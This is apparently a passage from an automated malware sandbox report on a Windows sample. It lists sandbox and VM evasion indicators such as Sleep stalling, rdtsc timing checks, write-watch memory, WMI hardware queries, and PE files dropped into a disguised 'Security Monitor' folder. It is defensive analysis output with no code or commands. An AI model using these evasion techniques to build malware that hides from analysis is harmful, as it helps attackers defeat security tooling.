Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found stalling execution ending in API Sleep call

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Stalling execution: Execution stalls by calling Sleep

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Memory allocated: 11B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Memory allocated: 2EF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Memory allocated: 2CF0000 memory reserve \| memory write watch	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 56_2_0339B8B0 rdtsc

56_2_0339B8B0

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Thread delayed: delay time: 922337203685477

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5421	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4349	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Window / User API: threadDelayed 4955	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Window / User API: threadDelayed 4852	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7773	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1803	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7675
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1907
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7496
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2007
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7051
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2577
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7275
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2438
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7317
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2311
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7705
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1758
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5860
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3819
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6868
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2845
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7870
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1772
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7871
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1569

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-9U2JI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JVHDE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-HNNTE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-1I5NJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\webbrowser.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-24VMR.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-H780M.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-NNSLF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-67IFD.tmp	Jump to dropped file

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Found large amount of non-executed APIs

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

API coverage: 7.6 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796	Thread sleep count: 5421 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800	Thread sleep count: 4349 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe TID: 8072	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe TID: 8140	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8064	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 964	Thread sleep count: 7773 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6052	Thread sleep count: 1803 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3580	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364	Thread sleep count: 7675 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364	Thread sleep count: 1907 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4668	Thread sleep count: 7496 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4668	Thread sleep count: 2007 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5996	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 768	Thread sleep count: 7051 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 908	Thread sleep count: 2577 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3580	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1872	Thread sleep count: 7275 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3568	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1824	Thread sleep count: 2438 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1888	Thread sleep count: 7317 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5728	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5216	Thread sleep count: 2311 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7208	Thread sleep count: 7705 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7208	Thread sleep count: 1758 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2768	Thread sleep count: 5860 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096	Thread sleep count: 3819 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3712	Thread sleep count: 6868 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 180	Thread sleep count: 2845 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5384	Thread sleep count: 7870 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616	Thread sleep count: 1772 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4024	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7572	Thread sleep count: 7871 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5932	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7572	Thread sleep count: 1569 > 30
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe TID: 7112	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 6684	Thread sleep count: 145 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 6012	Thread sleep count: 52 > 30

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Queries keyboard layouts

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

